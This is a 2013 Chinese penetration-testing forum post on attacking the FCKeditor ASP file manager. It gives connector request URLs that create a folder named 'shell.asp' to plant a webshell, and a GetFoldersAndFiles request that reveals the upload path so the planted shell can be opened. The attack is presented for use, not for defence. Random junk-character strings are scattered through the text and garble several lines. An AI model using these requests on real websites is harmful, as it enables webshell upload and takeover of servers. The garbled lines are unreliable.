找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 fckeditor找上传路径方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2242|回复: 0
打印 上一主题 下一主题

fckeditor找上传路径方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-10-17 19:37:28 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
网上流行着是上传是这样子的
1 T, j6 n) X; `. s; m2 I  F; {7 o
7 z7 w2 u4 T* E  u; a/ t( _: uhttp://localhost/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp, p: P! i2 q, z  y! f$ u* @7 J
http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
( U1 O  k3 W+ F3 _" s
: I) g! G3 Z  ^4 p上传后老找不到路径,测了一下,我发现
9 L& W7 N# q# J6 H( J) ~5 z- f& @- I! q
7 E! X" G# X1 k* pFCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/: x- r' I. d6 S7 K! d& z( e, F

! b0 {% g) B! Y3 Q3 B可以爆出路径,显示以下内容6 ~; c5 l( c: h

" i7 [; W. M4 {. _! s7 b
6 o1 r5 t% X' ^8 s, l& E得出路径,直接打开就见到马子
) T/ [3 ~: R7 ?  z
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表